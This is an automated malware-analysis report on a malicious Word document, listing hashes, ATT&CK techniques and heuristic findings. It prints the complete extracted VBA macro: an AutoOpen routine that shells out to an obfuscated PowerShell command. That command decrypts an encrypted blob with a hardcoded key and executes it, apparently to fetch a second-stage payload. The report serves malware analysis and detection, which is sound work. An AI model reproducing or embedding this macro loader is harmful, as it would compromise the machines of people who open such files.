Office (OLE) malware analysis — malicious · c7dc10d5cfcb4035

MALICIOUS

Office (OLE)

33.5 KB Created: 2017-11-09 22:23:00 Authoring application: Microsoft Office Word First seen: 2017-11-20

MD5: eeadb211c9c3f616f14534ade7db73f2 SHA-1: 23b27b1080d74a207a442cb66dade632618be073 SHA-256: c7dc10d5cfcb40357cdbbdb262a4ece1ca279b8b8815e715848d68508fd45375

252 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros that utilize the AutoOpen function to execute a PowerShell command. This command is heavily obfuscated but appears to be designed to download and execute a second-stage payload. The use of Shell() and PowerShell references within the VBA code strongly indicates a malicious intent to compromise the system.

Heuristics 9

VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

    & "coNVertTO-sECuRESTRInG -K 252,173,39,84,7,122,133,3,110,192,217,157,162,44,101,250,131,27,38,249,23,215,246,99,208,26,139,35,121,228,22,86) )))|. ( $PsHoMe[21]+$psHOmE[30]+'X')""
    Shell (c)
End Sub

PowerShell reference in VBA critical OLE_VBA_PS

PowerShell reference in VBA

Matched line in script

    Dim c As String
    c = "PowErShELl -exEcUTi BYPaSS   "( [RUNtiMe.iNTEropSerVices.MaRsHAL]::([runTiME.INteroPSERvICES.mArsHaL].GetMeMBeRs()[1].NaME).InVoke([Runtime.InTeROpserviCeS.MARSHAL]::secureStRinGTOgLOBALalLoCAnSi( $('76492d1116743f0423413b16050a5345MgB8AFQAZwBvAGkANABpADIAawA0AGsATgByAE8AdwBvAHAAZgBYAEcAWgBqAFEAPQA9AHwANgAwADUAYQA1ADkAOAA3ADIAZgBkADkAOABiAGQAMABiADMAZAAzADgANAA0AGIAYgBmADgAMgBh" _
    & "ADYAYQA0AGQAMQBiADkAMgBjADMAMQA3ADMAMQBhADMAYgA0ADkANABiAGUAOAAyADcANABlADUANQBjAGMAZABiAGYAOQA5AGMANwBhADAAYgA5AGQAZgBiADYAMwA0ADkAYgAwADcAMwBjAGMAMgBmAGEAZgA1ADAANQAwADIAZgBjAGUAMgA2AGUAYQA4ADkAYgAxAGEAMwBiADUAMAA2ADgAYQAzADUANAA3ADIAMgBlAGYAOQAwAGMANgAwADUAOQBjADEAMwAzAGMAYQA4AGEAOAA4AGUAMAA4AGQAYQAxADIANwA3ADgANwA3AGMAYQA4AGEAMwAwAGUAZAAxADgAYgAxADcAYQA5ADAANgA0AGUAZQA4ADQA" _

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Attribute VB_Customizable = True
Sub AutoOpen()
```
Reference to PowerShell high SC_STR_POWERSHELL

Reference to PowerShell
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3730 bytes
SHA-256: `b776231165dc576555245a1268b9ea2cd7c7a066aae19a9af6bf4a1badcac186`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 8 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Call Ig7mBmIp End Sub Sub Ig7mBmIp() Dim c As String c = "PowErShELl -exEcUTi BYPaSS "( [RUNtiMe.iNTEropSerVices.MaRsHAL]::([runTiME.INteroPSERvICES.mArsHaL].GetMeMBeRs()[1].NaME).InVoke([Runtime.InTeROpserviCeS.MARSHAL]::secureStRinGTOgLOBALalLoCAnSi( $('76492d1116743f0423413b16050a5345MgB8AFQAZwBvAGkANABpADIAawA0AGsATgByAE8AdwBvAHAAZgBYAEcAWgBqAFEAPQA9AHwANgAwADUAYQA1ADkAOAA3ADIAZgBkADkAOABiAGQAMABiADMAZAAzADgANAA0AGIAYgBmADgAMgBh" _ & "ADYAYQA0AGQAMQBiADkAMgBjADMAMQA3ADMAMQBhADMAYgA0ADkANABiAGUAOAAyADcANABlADUANQBjAGMAZABiAGYAOQA5AGMANwBhADAAYgA5AGQAZgBiADYAMwA0ADkAYgAwADcAMwBjAGMAMgBmAGEAZgA1ADAANQAwADIAZgBjAGUAMgA2AGUAYQA4ADkAYgAxAGEAMwBiADUAMAA2ADgAYQAzADUANAA3ADIAMgBlAGYAOQAwAGMANgAwADUAOQBjADEAMwAzAGMAYQA4AGEAOAA4AGUAMAA4AGQAYQAxADIANwA3ADgANwA3AGMAYQA4AGEAMwAwAGUAZAAxADgAYgAxADcAYQA5ADAANgA0AGUAZQA4ADQA" _ & "MQBhAGIAMgAyADkAMAA5ADcAMQAzAGQANQA0ADAAMgAxAGYAZQA0ADIAYQBkADAAYgA0ADMANwBiADEAZQBkADIANABmADMANQA0AGUAMQAzADQAMQAwADcAYwAyADMANwAzAGQAZgBlADIAMABiADcAYwA2ADAANgA3ADEANwBkADQAMwBjAGEAYwBjADgANgAzADMAOAA2AGMAYQAzADcANABhADEAZQBmADQAMwAzADQAMgA4ADkANAAyAGIAMgA4AGIANQBkADgAYQBiAGYAMwA3ADcAZQA0ADMAYwA3ADUAZgA3ADQAYgBiAGEAZQA5ADUAMgA3ADAAMwBlADYAMQA3AGIANwBhADYAMgA5ADcANwBhADUAZgAx" _ & "AGIAMwAxAGEANwBkADAAZABhAGMAOABiAGEANQAyADAAZQA0AGUANwBiAGMAOQAwADYAZgAzADgAZABlAGUANABjADEAMABmADkAOQAyAGMANwA1ADEAYgBkADgANQAxADcANgA2AGYAOABkAGYAMAA5AGIAYwBhADQAMAA4ADkANQBlADkAZgAyAGMAZgA3ADQAYwBlADIAOQBmADAANAA3AGMAYgA3ADUANgA1AGUAZQA2ADIAMAA3AGUAZQA5ADMAOQA5ADgAYwAzADkAZAAyAGUAMgBhADAAYwBmADYAZgBlADIANwBkADgANwBjADUAZQAwADkAMAA3ADcAYwBlAGMAZQA5ADQAMwAxADEAYwBkADAANQA4ADkA" _ & "MQA3ADIAYwBkAGEAMAAwADUAYgBkADUAYwBmADgAYQAyADgAOQBlAGEANAAxADAAMABiADkAMwAzADUAZAA4ADkAMwAzADUAOAA2ADUAZgBkADkAYwAwADUANQBhADUAOQA4AGYAYwAzADAANwBlAGYAZgBiAGEAYQA4ADgAZQA1ADUAOABmADcAYgBhADQAOAA4ADAAYQBiAGEAMwBiAGQANwAyADMAMAA2ADAAYwA4ADMAZAA1AGUANwA1AGQAMQAyAGIAYQA3AGIAMwAwADEANAAxADEAOQAzADgAZgAxAGMAMAAwADcAYwBhADMAZAA3AGIAMQBjADUAZgAxADYAZAAyADcANAAxAGYANwAzADYAMwBjADMAMwAz" _ & "ADEAMwA4AGMANQBiADkAYQAzADcAYgBkADgANgA3ADgAOQBiADIAYgBkAGQAYgAwADMAZgBlADcAZQAzAGIAOABmADMANQA1ADQANwAzADIAMgAxADEAZQA3ADMANABiADUAZQAzAGYANwAyADIANgBhADQAOQBjADAAZgA4ADQAMQA1ADEAZAA5AGQAZABjADQAMQAxADYAMgBlAGMAZgA3ADMANwBmADcAZQA0AGEAZAAyADcANQA0ADUAZgA3ADUAYQBmADQAYgBkAGUAMwA3ADAAYgBlADYAYQA2ADQANQAzAGYAYwA0ADQAMwA0AGMAYQBkADkAOQA5ADgAYQA2ADUAMQAxADEAYgA0ADcAZQAzAGEAZgA3ADkA" _ & "OAA1ADkAYwBlADAAZgA0AGUAOQA1ADcAZQA5ADcAOABkADMANwBkADQANwAyADkAZQBjADIAMAAwAGIAYwA5ADgANQAwAGYAMABiADEAMABjADcAMABhAGYAZQA3AGYANgA5AGQAOQA4AGIAZgA0AGEAYgBiADMAMgA0ADIAZABhAGUAMAAzADQAMAA5ADQAMwA2AGYAZgA3ADYAYgBkADAANQBlADkANwBlAGEAZQBhAGEANABmADkANwBkADIANgAzAGUANwA3AGYAZgA4AGIAOQA1ADAAYwBmADEAOQA3AGEAMgAyAGQAMQBkADYAOABjADkAMAAzAGMAZQBlADUANgAxADcANAA2AGQANwBhADkANgA3AGIAYgAw" _ & "ADUAYwAyAGEAMABkADIANgA3ADcAYwBlADIAOABlADUANwA2AGMAZAA5ADIAOQBmAGEAOABiAGYANwBlAGQAMwA3ADcAYwAyAGUANQA3AGMAMwA4AGMANwBlADEAOQBkADYAMABlADAANwA3AGQAYQBkAGEANgBiAGEAZABmAGQAMgA0AGQAOABiADEANAA3ADUAOAAzAGYANwBmAGUANgAzADMAMgAxADIAMwAzADEAYwBmADEAZgA0ADQAYQAxADkAZQAyADIAOAAyAGIAOQBjAGMAYwBhADQAOQAxAGEAMQA3ADUANQAxADQANwA1AGUAMQA2ADkAZgA0ADIAYQA2ADkAYgA3ADYANAA3ADMAMgA0ADkAMAA=' \| " _ & "coNVertTO-sECuRESTRInG -K 252,173,39,84,7,122,133,3,110,192,217,157,162,44,101,250,131,27,38,249,23,215,246,99,208,26,139,35,121,228,22,86) )))\|. ( $PsHoMe[21]+$psHOmE[30]+'X')"" Shell (c) End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.